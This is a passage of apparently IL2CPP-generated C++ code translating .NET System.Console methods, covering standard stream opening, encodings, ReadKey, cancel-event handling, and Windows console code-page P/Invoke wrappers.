((Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_StaticFields*)il2cpp_codegen_static_fields_for(Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7_il2cpp_TypeInfo_var))->get_Null_1(); V_0 = L_4; goto IL_0017; } // end catch (depth: 1) IL_0017: { Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_5 = V_0; return L_5; } } // System.IO.Stream System.Console::OpenStandardError(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F (int32_t ___bufferSize0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_OpenStandardError_mC6642ADBF10786E986FCA8E8708C35566A54137F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var); intptr_t L_0 = MonoIO_get_ConsoleError_mBF62E29F14657C9B5982694B3901F6AD7EEB6EFD(/*hidden argument*/NULL); int32_t L_1 = ___bufferSize0; IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_2 = Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340((intptr_t)L_0, 2, L_1, /*hidden argument*/NULL); return L_2; } } // System.IO.Stream System.Console::OpenStandardInput(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98 (int32_t ___bufferSize0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_OpenStandardInput_m70507BD4CEF7AAFB01030995036454D9D6F4BC98_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var); intptr_t L_0 = MonoIO_get_ConsoleInput_mFC797DF758331A0370296F8DF3136A6B9F1995DC(/*hidden argument*/NULL); int32_t L_1 = ___bufferSize0; IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_2 = Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340((intptr_t)L_0, 1, L_1, /*hidden argument*/NULL); return L_2; } } // System.IO.Stream System.Console::OpenStandardOutput(System.Int32) extern "C" IL2CPP_METHOD_ATTR Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823 (int32_t ___bufferSize0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_OpenStandardOutput_m9C602CA7C2D5E989D45913987E2E581481EC9823_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(MonoIO_t1C937D98906A6B4CFC3F10BFC69C70F2F70166C6_il2cpp_TypeInfo_var); intptr_t L_0 = MonoIO_get_ConsoleOutput_m7E36914F192D603C50A8F39745F6443BB2882859(/*hidden argument*/NULL); int32_t L_1 = ___bufferSize0; IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Stream_tFC50657DD5AAB87770987F9179D934A51D99D5E7 * L_2 = Console_Open_mDAC2FE85ABE14206C01E7AA29617DAB54A2EA340((intptr_t)L_0, 2, L_1, /*hidden argument*/NULL); return L_2; } } // System.Text.Encoding System.Console::get_InputEncoding() extern "C" IL2CPP_METHOD_ATTR Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * Console_get_InputEncoding_m60EAA2E167A0C8C681997B998E851D8CD6C954FE (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_get_InputEncoding_m60EAA2E167A0C8C681997B998E851D8CD6C954FE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_0 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_inputEncoding_3(); return L_0; } } // System.Text.Encoding System.Console::get_OutputEncoding() extern "C" IL2CPP_METHOD_ATTR Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * Console_get_OutputEncoding_mA23798B6CE69F59EAA00C8206EF8552196120647 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_get_OutputEncoding_mA23798B6CE69F59EAA00C8206EF8552196120647_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Encoding_t7837A3C0F55EAE0E3959A53C6D6E88B113ED78A4 * L_0 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_outputEncoding_4(); return L_0; } } // System.ConsoleKeyInfo System.Console::ReadKey() extern "C" IL2CPP_METHOD_ATTR ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 Console_ReadKey_m8E93A1A91E2D0BE19342C479E9D769AB0C6E37B4 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_ReadKey_m8E93A1A91E2D0BE19342C479E9D769AB0C6E37B4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_0 = Console_ReadKey_m64DBD2BDB13D04E2E73B95F1BD3B9D08B370D3BA((bool)0, /*hidden argument*/NULL); return L_0; } } // System.ConsoleKeyInfo System.Console::ReadKey(System.Boolean) extern "C" IL2CPP_METHOD_ATTR ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 Console_ReadKey_m64DBD2BDB13D04E2E73B95F1BD3B9D08B370D3BA (bool ___intercept0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_ReadKey_m64DBD2BDB13D04E2E73B95F1BD3B9D08B370D3BA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { bool L_0 = ___intercept0; IL2CPP_RUNTIME_CLASS_INIT(ConsoleDriver_t4F24DB42600CA82912181D5D312902B8BEFEE101_il2cpp_TypeInfo_var); ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 L_1 = ConsoleDriver_ReadKey_m26C9ECDAE36AEE4B923BFDD9420D341AB3DDA900(L_0, /*hidden argument*/NULL); return L_1; } } // System.Void System.Console::DoConsoleCancelEvent() extern "C" IL2CPP_METHOD_ATTR void Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD_MetadataUsageId); s_Il2CppMethodInitialized = true; } bool V_0 = false; ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * V_1 = NULL; DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* V_2 = NULL; int32_t V_3 = 0; ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * V_4 = NULL; Exception_t * __last_unhandled_exception = 0; NO_UNUSED_WARNING (__last_unhandled_exception); Exception_t * __exception_local = 0; NO_UNUSED_WARNING (__exception_local); int32_t __leave_target = -1; NO_UNUSED_WARNING (__leave_target); { V_0 = (bool)1; IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * L_0 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_cancel_event_5(); if (!L_0) { goto IL_004b; } } { ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * L_1 = (ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 *)il2cpp_codegen_object_new(ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760_il2cpp_TypeInfo_var); ConsoleCancelEventArgs__ctor_mF734EC3C82D0A490C0A05416E566BFC53ACFB471(L_1, 0, /*hidden argument*/NULL); V_1 = L_1; IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * L_2 = ((Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_StaticFields*)il2cpp_codegen_static_fields_for(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var))->get_cancel_event_5(); DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* L_3 = VirtFuncInvoker0< DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* >::Invoke(9 /* System.Delegate[] System.Delegate::GetInvocationList() */, L_2); V_2 = L_3; V_3 = 0; goto IL_003b; } IL_001f: { DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* L_4 = V_2; int32_t L_5 = V_3; int32_t L_6 = L_5; Delegate_t * L_7 = (L_4)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_6)); V_4 = ((ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 *)CastclassSealed((RuntimeObject*)L_7, ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4_il2cpp_TypeInfo_var)); } IL_0029: try { // begin try (depth: 1) ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 * L_8 = V_4; ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * L_9 = V_1; ConsoleCancelEventHandler_Invoke_mC7E3B6D8555B865719369DBF255D2BB7E952ADD2(L_8, NULL, L_9, /*hidden argument*/NULL); goto IL_0037; } // end try (depth: 1) catch(Il2CppExceptionWrapper& e) { __exception_local = (Exception_t *)e.ex; if(il2cpp_codegen_class_is_assignable_from (RuntimeObject_il2cpp_TypeInfo_var, il2cpp_codegen_object_class(e.ex))) goto CATCH_0034; throw e; } CATCH_0034: { // begin catch(System.Object) goto IL_0037; } // end catch (depth: 1) IL_0037: { int32_t L_10 = V_3; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_10, (int32_t)1)); } IL_003b: { int32_t L_11 = V_3; DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* L_12 = V_2; if ((((int32_t)L_11) < ((int32_t)(((int32_t)((int32_t)(((RuntimeArray *)L_12)->max_length))))))) { goto IL_001f; } } { ConsoleCancelEventArgs_t2B351DE0A5B10D5CA5E93A7AE36C16DB17D73760 * L_13 = V_1; bool L_14 = ConsoleCancelEventArgs_get_Cancel_mA996E8B7FE802D9A15208AFF397481646751A46F(L_13, /*hidden argument*/NULL); V_0 = (bool)((((int32_t)L_14) == ((int32_t)0))? 1 : 0); } IL_004b: { bool L_15 = V_0; if (!L_15) { goto IL_0055; } } { Environment_Exit_m3398C2AF5F6AE7197249ECFEDFC624582ADB86EE(((int32_t)58), /*hidden argument*/NULL); } IL_0055: { return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif extern "C" void DelegatePInvokeWrapper_InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, const RuntimeMethod* method) { typedef void (DEFAULT_CALL *PInvokeFunc)(); PInvokeFunc il2cppPInvokeFunc = reinterpret_cast<PInvokeFunc>(il2cpp_codegen_get_method_pointer(((RuntimeDelegate*)__this)->method)); // Native function invocation il2cppPInvokeFunc(); } // System.Void System.Console/InternalCancelHandler::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void InternalCancelHandler__ctor_m82D5D85CC1F50839540B6072DFCADAD07F6223FF (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method) { __this->set_method_ptr_0(il2cpp_codegen_get_method_pointer((RuntimeMethod*)___method1)); __this->set_method_3(___method1); __this->set_m_target_2(___object0); } // System.Void System.Console/InternalCancelHandler::Invoke() extern "C" IL2CPP_METHOD_ATTR void InternalCancelHandler_Invoke_m93DB1D6DCBA4D1E40DD0EF832A3E7FAB4D40BBA0 (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, const RuntimeMethod* method) { DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* delegatesToInvoke = __this->get_delegates_11(); if (delegatesToInvoke != NULL) { il2cpp_array_size_t length = delegatesToInvoke->max_length; for (il2cpp_array_size_t i = 0; i < length; i++) { Delegate_t* currentDelegate = (delegatesToInvoke)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(i)); Il2CppMethodPointer targetMethodPointer = currentDelegate->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(currentDelegate->get_method_3()); RuntimeObject* targetThis = currentDelegate->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 0) { // open typedef void (*FunctionPointerType) (const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetMethod); } else { // closed typedef void (*FunctionPointerType) (void*, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker0::Invoke(targetMethod, targetThis); else GenericVirtActionInvoker0::Invoke(targetMethod, targetThis); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker0::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis); else VirtActionInvoker0::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis); } } } else { typedef void (*FunctionPointerType) (void*, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, targetMethod); } } } } else { Il2CppMethodPointer targetMethodPointer = __this->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(__this->get_method_3()); RuntimeObject* targetThis = __this->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 0) { // open typedef void (*FunctionPointerType) (const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetMethod); } else { // closed typedef void (*FunctionPointerType) (void*, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) GenericInterfaceActionInvoker0::Invoke(targetMethod, targetThis); else GenericVirtActionInvoker0::Invoke(targetMethod, targetThis); } else { if (il2cpp_codegen_method_is_interface_method(targetMethod)) InterfaceActionInvoker0::Invoke(il2cpp_codegen_method_get_slot(targetMethod), il2cpp_codegen_method_get_declaring_type(targetMethod), targetThis); else VirtActionInvoker0::Invoke(il2cpp_codegen_method_get_slot(targetMethod), targetThis); } } } else { typedef void (*FunctionPointerType) (void*, const RuntimeMethod*); ((FunctionPointerType)targetMethodPointer)(targetThis, targetMethod); } } } } // System.IAsyncResult System.Console/InternalCancelHandler::BeginInvoke(System.AsyncCallback,System.Object) extern "C" IL2CPP_METHOD_ATTR RuntimeObject* InternalCancelHandler_BeginInvoke_m1C97C11E4F488705DA654CD6E359B1240C5827C5 (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, AsyncCallback_t3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4 * ___callback0, RuntimeObject * ___object1, const RuntimeMethod* method) { void *__d_args[1] = {0}; return (RuntimeObject*)il2cpp_codegen_delegate_begin_invoke((RuntimeDelegate*)__this, __d_args, (RuntimeDelegate*)___callback0, (RuntimeObject*)___object1); } // System.Void System.Console/InternalCancelHandler::EndInvoke(System.IAsyncResult) extern "C" IL2CPP_METHOD_ATTR void InternalCancelHandler_EndInvoke_mD21C5B182EEE02EECC01C62BB039F46FEFD429EF (InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A * __this, RuntimeObject* ___result0, const RuntimeMethod* method) { il2cpp_codegen_delegate_end_invoke((Il2CppAsyncResult*) ___result0, 0); } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Int32 System.Console/WindowsConsole::GetConsoleCP() extern "C" IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetConsoleCP_m113D8CEC7639D78D9C1D5BA7EA60D70C2F5DB870 (const RuntimeMethod* method) { typedef int32_t (DEFAULT_CALL *PInvokeFunc) (); static PInvokeFunc il2cppPInvokeFunc; if (il2cppPInvokeFunc == NULL) { int parameterSize = 0; il2cppPInvokeFunc = il2cpp_codegen_resolve_pinvoke<PInvokeFunc>(IL2CPP_NATIVE_STRING("kernel32.dll"), "GetConsoleCP", IL2CPP_CALL_DEFAULT, CHARSET_UNICODE, parameterSize, true); if (il2cppPInvokeFunc == NULL) { IL2CPP_RAISE_MANAGED_EXCEPTION(il2cpp_codegen_get_not_supported_exception("Unable to find method for p/invoke: 'GetConsoleCP'"), NULL, NULL); } } // Native function invocation int32_t returnValue = il2cppPInvokeFunc(); return returnValue; } // System.Int32 System.Console/WindowsConsole::GetConsoleOutputCP() extern "C" IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetConsoleOutputCP_m7FC4A3A6237BCB23BFCFCD4295C06F42C3FEE440 (const RuntimeMethod* method) { typedef int32_t (DEFAULT_CALL *PInvokeFunc) (); static PInvokeFunc il2cppPInvokeFunc; if (il2cppPInvokeFunc == NULL) { int parameterSize = 0; il2cppPInvokeFunc = il2cpp_codegen_resolve_pinvoke<PInvokeFunc>(IL2CPP_NATIVE_STRING("kernel32.dll"), "GetConsoleOutputCP", IL2CPP_CALL_DEFAULT, CHARSET_UNICODE, parameterSize, true); if (il2cppPInvokeFunc == NULL) { IL2CPP_RAISE_MANAGED_EXCEPTION(il2cpp_codegen_get_not_supported_exception("Unable to find method for p/invoke: 'GetConsoleOutputCP'"), NULL, NULL); } } // Native function invocation int32_t returnValue = il2cppPInvokeFunc(); return returnValue; } // System.Boolean System.Console/WindowsConsole::DoWindowsConsoleCancelEvent(System.Int32) extern "C" IL2CPP_METHOD_ATTR bool WindowsConsole_DoWindowsConsoleCancelEvent_m4FAC7A4ADAFBDC6AACB88F9B38FCA6511BC79627 (int32_t ___keyCode0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (WindowsConsole_DoWindowsConsoleCancelEvent_m4FAC7A4ADAFBDC6AACB88F9B38FCA6511BC79627_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___keyCode0; if (L_0) { goto IL_0008; } } { IL2CPP_RUNTIME_CLASS_INIT(Console_t5C8E87BA271B0DECA837A3BF9093AC3560DB3D5D_il2cpp_TypeInfo_var); Console_DoConsoleCancelEvent_mBC4C4C488FCE021441F2C1D5A25D86F2F8A94FDD(/*hidden argument*/NULL); } IL_0008: { int32_t L_1 = ___keyCode0; return (bool)((((int32_t)L_1) == ((int32_t)0))? 1 : 0); } } // System.Int32 System.Console/WindowsConsole::GetInputCodePage() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetInputCodePage_m492EDD139F7E66A90971A069FA4DD63000F77B4F (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (WindowsConsole_GetInputCodePage_m492EDD139F7E66A90971A069FA4DD63000F77B4F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var); int32_t L_0 = WindowsConsole_GetConsoleCP_m113D8CEC7639D78D9C1D5BA7EA60D70C2F5DB870(/*hidden argument*/NULL); return L_0; } } // System.Int32 System.Console/WindowsConsole::GetOutputCodePage() extern "C" IL2CPP_NO_INLINE IL2CPP_METHOD_ATTR int32_t WindowsConsole_GetOutputCodePage_mAF546B0FBC6558F7F2636A86E8733AD4AD2C4DE3 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (WindowsConsole_GetOutputCodePage_mAF546B0FBC6558F7F2636A86E8733AD4AD2C4DE3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { IL2CPP_RUNTIME_CLASS_INIT(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var); int32_t L_0 = WindowsConsole_GetConsoleOutputCP_m7FC4A3A6237BCB23BFCFCD4295C06F42C3FEE440(/*hidden argument*/NULL); return L_0; } } // System.Void System.Console/WindowsConsole::.cctor() extern "C" IL2CPP_METHOD_ATTR void WindowsConsole__cctor_m5F32EAD6176EB9FCC8E4BF9E34FCA25348324BB9 (const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (WindowsConsole__cctor_m5F32EAD6176EB9FCC8E4BF9E34FCA25348324BB9_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ((WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_StaticFields*)il2cpp_codegen_static_fields_for(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var))->set_ctrlHandlerAdded_0((bool)0); WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * L_0 = (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 *)il2cpp_codegen_object_new(WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51_il2cpp_TypeInfo_var); WindowsCancelHandler__ctor_m75C4D20D6754BB22B858DCB2062CCD61742DEFCF(L_0, NULL, (intptr_t)((intptr_t)WindowsConsole_DoWindowsConsoleCancelEvent_m4FAC7A4ADAFBDC6AACB88F9B38FCA6511BC79627_RuntimeMethod_var), /*hidden argument*/NULL); ((WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_StaticFields*)il2cpp_codegen_static_fields_for(WindowsConsole_tE2543F6EAD1001D1F2DE2CC0A5495048EED8C21B_il2cpp_TypeInfo_var))->set_cancelHandler_1(L_0); return; } } #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif extern "C" bool DelegatePInvokeWrapper_WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, int32_t ___keyCode0, const RuntimeMethod* method) { typedef int32_t (DEFAULT_CALL *PInvokeFunc)(int32_t); PInvokeFunc il2cppPInvokeFunc = reinterpret_cast<PInvokeFunc>(il2cpp_codegen_get_method_pointer(((RuntimeDelegate*)__this)->method)); // Native function invocation int32_t returnValue = il2cppPInvokeFunc(___keyCode0); return static_cast<bool>(returnValue); } // System.Void System.Console/WindowsConsole/WindowsCancelHandler::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void WindowsCancelHandler__ctor_m75C4D20D6754BB22B858DCB2062CCD61742DEFCF (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method) { __this->set_method_ptr_0(il2cpp_codegen_get_method_pointer((RuntimeMethod*)___method1)); __this->set_method_3(___method1); __this->set_m_target_2(___object0); } // System.Boolean System.Console/WindowsConsole/WindowsCancelHandler::Invoke(System.Int32) extern "C" IL2CPP_METHOD_ATTR bool WindowsCancelHandler_Invoke_m751F4D23F6167DB32EFD5418CDD1DC0BD1132435 (WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 * __this, int32_t ___keyCode0, const RuntimeMethod* method) { bool result = false; DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86* delegatesToInvoke = __this->get_delegates_11(); if (delegatesToInvoke != NULL) { il2cpp_array_size_t length = delegatesToInvoke->max_length; for (il2cpp_array_size_t i = 0; i < length; i++) { Delegate_t* currentDelegate = (delegatesToInvoke)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(i)); Il2CppMethodPointer targetMethodPointer = currentDelegate->get_method_ptr_0(); RuntimeMethod* targetMethod = (RuntimeMethod*)(currentDelegate->get_method_3()); RuntimeObject* targetThis = currentDelegate->get_m_target_2(); if (!il2cpp_codegen_method_is_virtual(targetMethod)) { il2cpp_codegen_raise_execution_engine_exception_if_method_is_not_found(targetMethod); } bool ___methodIsStatic = MethodIsStatic(targetMethod); int ___parameterCount = il2cpp_codegen_method_parameter_count(targetMethod); if (___methodIsStatic) { if (___parameterCount == 1) { // open typedef bool (*FunctionPointerType) (int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(___keyCode0, targetMethod); } else { // closed typedef bool (*FunctionPointerType) (void*, int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(targetThis, ___keyCode0, targetMethod); } } else { // closed if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (il2cpp_codegen_method_is_virtual(targetMethod) && !il2cpp_codegen_object_is_of_sealed_type(targetThis) && il2cpp_codegen_delegate_has_invoker((Il2CppDelegate*)__this)) { if (targetThis == NULL) { typedef bool (*FunctionPointerType) (int32_t, const RuntimeMethod*); result = ((FunctionPointerType)targetMethodPointer)(___keyCode0, targetMethod); } else if (il2cpp_codegen_method_is_generic_instance(targetMethod)) { if (il2cpp_codegen_method_is_interface_method(targetMethod)) result = GenericInterfaceFuncInvoker1< bool, 